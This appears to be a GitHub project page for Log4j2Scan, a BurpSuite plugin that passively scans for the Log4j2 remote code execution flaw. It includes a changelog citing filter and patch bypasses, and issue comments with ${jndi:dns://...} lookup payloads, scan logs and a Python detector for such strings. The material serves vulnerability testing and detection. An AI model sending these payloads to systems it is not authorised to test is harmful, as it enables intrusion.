Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite

Overview

Log4j2Scan

This tool is only for learning, research and self-examination. It should not be used for illegal purposes. All risks arising from the use of this tool have nothing to do with me!

dnslog.cn is intermittently unreachable because of the number of requests it receives. If you are unable to scan, try changing the dnslog platform from the UI.

Log4j2 Remote Code Execution Vulnerability, Passive Scan Plugin for BurpSuite.

It reports the exact vulnerable parameter and the location of the vulnerability, supports extension with multiple dnslog platforms, and automatically ignores static files.

Vulnerability detection currently supports only the following types:

  • Url
  • Cookie
  • Header
  • Body(x-www-form-urlencoded, json, xml, multipart)

Build

Maven and JDK 11.0 or later are recommended.

$ mvn package

ChangeLog

2021/12/15

v0.9
  1. add GoDnslog backend, thanks to @54Pany.
  2. add fuzz setting ui.
  3. add poc setting ui.
  4. add Body(json, xml, multipart) fuzz.
  5. opt header guess-fuzz logic.

2021/12/14

v0.8.1
  1. bypass dnslog.cn filter.
v0.8
  1. add backend setting panel.
  2. add RevSuit-DNS backend.

2021/12/13

v0.7
  1. add RevSuit-RMI backend.
  2. fix issue where a domain lowercased by the server could not be matched.

2021/12/12

v0.6
  1. add static-file ignore.
  2. add multi poc support.
  3. add burpcollaborator dnslog backend; dnslog.cn is used by default.

2021/12/11

v0.5
  1. add header fuzz.
v0.4
  1. add rc1 patch bypass.

Acknowledgements

Some of the code in the plugin is borrowed from the following projects:

https://github.com/pmiaowu/BurpShiroPassiveScan/

Comments
  • No longer compatible with burpsuite 2022.9.1

    The log is as follows:

    Log4j2Scan v0.12
    Log4j2Scan loaded successfully!
    
    Scanning: http://123.58.224.8:30596/hello?payload=111
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    Scan complete: http://123.58.224.8:30596/hello?payload=111 - No issue found.
    Scanning: http://123.58.224.8:30596/
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    java.lang.IllegalArgumentException: method GET must not have a request body.
    Scan complete: http://123.58.224.8:30596/ - No issue found.
    Log4j2Scan loaded successfully!
    
    Log4j2Scan loaded successfully!
    
    Scanning: http://123.58.224.8:30596/hello?payload=111
    Scan complete: http://123.58.224.8:30596/hello?payload=111 - No issue found.
    

    Requests can no longer be sent normally, and the logger shows no record of any requests being sent.

    opened by k-fire 8
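  • On an internal network with no outbound access or no domain name, it is recommended to detect using the form ${jndi:dns://xxx.xxx.xxx.xxx:port/dnsFlag.XXX}

    The current RevSuitDNS backend and POC9 use the form ${jndi:dns://xxx.dnsFlag.domain}/yyy}, which still depends on a domain name. If this is changed to the form ${jndi:dns://domain/dnsFlag.XXX}, with domain set to an IP address and dnsFlag.XXX used as the detection marker, the dependency on a domain name can be removed; the final exp is ${jndi:dns://1.2.3.4/dnsFlag.xxx/yyy}. I made a small change; only three lines of code need to be modified.

    The author can take a look at whether this is feasible.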

    opened by hanc00l 6
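
Seen from the defender's side, the types listed in the README (Url, Cookie, Header, Body) are also the places to look for a lookup string in captured traffic. The following is an added example, not code from the plugin or from the issue above: it parses a raw HTTP request, reports each `${jndi:...}` lookup with its location, and flags hosts given as IP literals, the form proposed in the issue, which a watch on dnslog domain names alone would not match. The names `find_jndi`, `fields` and `is_ip`, the sample request and its host names are assumptions made for illustration; XML and multipart bodies are not handled.

```python
import ipaddress
import json
import re
from urllib.parse import parse_qsl, urlsplit

# ${jndi:<scheme>://<host>...}; the host may be a DNS name or an IP literal.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)", re.I)

# Constructed sample request; the lookup strings reuse the forms quoted on this page.
SAMPLE = (
    "POST /hello?payload=111 HTTP/1.1\r\n"
    "Host: app.example\r\n"
    "Cookie: sid=abc; theme=${jndi:dns://1.2.3.4/dnsFlag.xxx/yyy}\r\n"
    "X-Api-Version: ${jndi:dns://xxx.dnsFlag.example/yyy}\r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"user": "bob", "note": "${jndi:dns://10.0.0.5:53/dnsFlag.zzz}"}'
)

def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def fields(raw):
    """Yield (location, name, value) for Url, Cookie, Header and Body fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    for k, v in parse_qsl(urlsplit(lines[0].split(" ")[1]).query):
        yield "Url", k, v
    ctype = ""
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.lower() == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                yield "Cookie", k, v
        else:
            yield "Header", name, value.strip()
            ctype = value.lower() if name.lower() == "content-type" else ctype
    pairs = json.loads(body).items() if "json" in ctype else parse_qsl(body)  # flat JSON only
    for k, v in pairs:
        yield "Body", k, str(v)

def find_jndi(raw):
    """Return (location, name, scheme, host, host_is_ip) for each lookup found."""
    return [(loc, name, m["scheme"].lower(), m["host"], is_ip(m["host"]))
            for loc, name, value in fields(raw) for m in JNDI_RE.finditer(value)]
```
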
  • Packaging failed

    public class Ceye implements IBackend {
        OkHttpClient client = new OkHttpClient().newBuilder().
                connectTimeout(3000, TimeUnit.SECONDS).
                callTimeout(3000, TimeUnit.SECONDS).build();
        String platformUrl = "http://api.ceye.io/";
        String rootDomain = "xxx.ceye.io";
        String token = "xxxx";
    
    public Log4j2Scanner(final BurpExtender newParent) {
         this.parent = newParent;
         this.helper = newParent.helpers;
         this.pocs = new IPOC[]{new POC1(), new POC2(), new POC3(), new POC4(), new POC11()};
         this.backend = new Ceye("xxx.ceye.io", "xxxx");
         if (this.backend.getState()) {
             parent.stdout.println("Log4j2Scan loaded successfully!\r\n");
         } else {
             parent.stdout.println("Backend init failed!\r\n");
         }
     }
    

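    Configuring it this way causes packaging to fail. If I use this.backend = new Ceye(); directly in Log4j2Scanner, it packages successfully, but I do not receive any bp alerts.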

    opened by pykiller 2
  • Dnslog init failed!


    Hello!

    I've added the .jar file to my Burp Extensions extender tab and I get the following error:

    initDomain failed: www.dnslog.cn: No address associated with hostname

    opened by oppsec 2
Releases(V0.13.1)
Owner
Whwlsfb
A Pentester & Developer & Geeker